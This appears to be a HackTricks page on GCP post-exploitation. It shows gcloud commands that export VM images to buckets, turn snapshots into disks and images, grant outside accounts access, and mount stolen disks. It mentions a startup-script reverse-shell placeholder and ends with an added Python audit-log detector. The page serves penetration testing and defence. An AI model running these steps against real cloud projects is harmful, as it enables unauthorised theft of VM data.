Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
For more information about Compute and VPC (Networking) check:
{% content-ref url="../../gcp-pentesting/gcp-services/gcp-compute-instances-enum/" %} gcp-compute-instances-enum {% endcontent-ref %}
Having permissions over images would allow an attacker to access the data contained in already existing images, or to create new images of running VMs and read their data without ever having access to the running VM.
It's possible to export a VM image to a bucket, then download it and mount it locally, with the command:
{% code overflow="wrap" %}
gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# Then download the export from the bucket and mount it locally
{% endcode %}
To perform this action the attacker might need privileges over the storage bucket and will certainly need privileges over Cloud Build, as it's the service that is going to be asked to perform the export.
Moreover, for this to work the Cloud Build SA and the compute SA need privileged permissions.
The cloudbuild SA <project-id>@cloudbuild.gserviceaccount.com
needs:
- roles/iam.serviceAccountTokenCreator
- roles/compute.admin
- roles/iam.serviceAccountUser
And the SA <project-id>-compute@developer.gserviceaccount.com
needs:
- roles/compute.storageAdmin
- roles/storage.objectAdmin
It's not possible to directly export snapshots and disks, but it's possible to transform a snapshot into a disk, a disk into an image and then, following the previous section, export that image to inspect it locally:
{% code overflow="wrap" %}
# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]
# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]
{% endcode %}
To access the data stored in an image (or inside a running VM from which an attacker has created an image), it is possible to grant an external account access over the image:
gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'
and then create a new VM from it:
gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]
If you could not give your external account access over the image, you could launch a VM using that image in the victim's project and make the metadata execute a reverse shell to access the image, adding the parameter:
--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'
To access the data stored in a disk or a snapshot, you could transform the snapshot into a disk, the disk into an image and follow the previous steps.
Or you could grant an external account access over the disk (if the starting point is a snapshot, give access over the snapshot or create a disk from it):
gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'
Attach the disk to an instance:
gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]
Mount the disk inside the VM:
- SSH into the VM:
gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]
- Identify the disk: once inside the VM, identify the new disk by listing the disk devices. Typically it appears as /dev/sdb, /dev/sdc, etc.
- Format and mount the disk (format only if it's a new or raw disk):
  - Create a mount point:
sudo mkdir -p /mnt/disks/[MOUNT_DIR]
  - Mount the disk:
sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
If you cannot give an external project access to the snapshot or disk, you might need to perform these actions inside an instance in the same project as the snapshot/disk.
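From the defender's side, every step of the chains above (disk to image, Cloud Build export, IAM grant to an outside principal, VM booted with a startup script) leaves a Cloud Audit Log entry. The following is an added example, not part of the original page, that scans newline-delimited audit entries for those steps; the log lines are constructed and simplified, and the `methodName` strings and the trusted domain `corp.example` are assumptions to check against your own project's logs.

```python
import json

# Constructed sample Cloud Audit Log entries (simplified shape, not real captures).
# The methodName strings are assumptions; verify them against your own project's logs.
SAMPLE_LOG = r"""
{"protoPayload":{"methodName":"v1.compute.images.insert","authenticationInfo":{"principalEmail":"dev@corp.example"},"request":{"name":"prod-db-img","sourceDisk":"zones/us-central1-a/disks/prod-db"}}}
{"protoPayload":{"methodName":"google.devtools.cloudbuild.v1.CloudBuild.CreateBuild","authenticationInfo":{"principalEmail":"dev@corp.example"},"request":{}}}
{"protoPayload":{"methodName":"v1.compute.images.setIamPolicy","authenticationInfo":{"principalEmail":"dev@corp.example"},"request":{"policy":{"bindings":[{"role":"roles/compute.imageUser","members":["serviceAccount:sa@other-proj.iam.gserviceaccount.com"]}]}}}}
{"protoPayload":{"methodName":"v1.compute.instances.insert","authenticationInfo":{"principalEmail":"dev@corp.example"},"request":{"name":"vm-1","metadata":{"items":[{"key":"startup-script","value":"#! /bin/bash\necho hello"}]}}}}
{"protoPayload":{"methodName":"v1.compute.instances.list","authenticationInfo":{"principalEmail":"dev@corp.example"},"request":{}}}
"""

TRUSTED_DOMAINS = ("@corp.example",)  # assumption: the organisation's own identity domains
WATCHED_ROLES = {"roles/compute.imageUser", "roles/compute.storageAdmin", "roles/storage.objectAdmin"}

def is_external(member):
    """True if an IAM member ('user:a@x', 'serviceAccount:b@y', ...) is outside our domains."""
    _, _, email = member.partition(":")
    return not email.endswith(TRUSTED_DOMAINS)

def analyse(entry):
    """Return (tag, principal, detail) findings for one audit log entry."""
    p = entry["protoPayload"]
    method, who = p["methodName"], p["authenticationInfo"]["principalEmail"]
    req = p.get("request", {})
    findings = []
    if method.endswith("images.insert") and "sourceDisk" in req:  # disk -> image step
        findings.append(("image_from_disk", who, req["sourceDisk"]))
    if method.endswith("CloudBuild.CreateBuild"):  # image export runs as a Cloud Build job
        findings.append(("cloudbuild_job", who, "possible image export to a bucket"))
    if method.lower().endswith("setiampolicy"):  # grant of image/disk roles to an outsider
        for b in req.get("policy", {}).get("bindings", []):
            if b.get("role") in WATCHED_ROLES:
                for m in b.get("members", []):
                    if is_external(m):
                        findings.append(("external_grant", who, f"{b['role']} -> {m}"))
    if method.endswith("instances.insert"):  # VM created with a startup-script metadata key
        keys = {i.get("key") for i in req.get("metadata", {}).get("items", [])}
        if "startup-script" in keys:
            findings.append(("startup_script_vm", who, req.get("name", "?")))
    return findings

def scan(log_text):
    """Parse newline-delimited JSON audit entries and collect all findings."""
    out = []
    for line in log_text.strip().splitlines():
        out.extend(analyse(json.loads(line)))
    return out
```

Calling `scan(SAMPLE_LOG)` returns one finding per suspicious entry and none for the plain `instances.list` call; correlate findings by principal and time window to spot the full chain rather than alerting on each step in isolation.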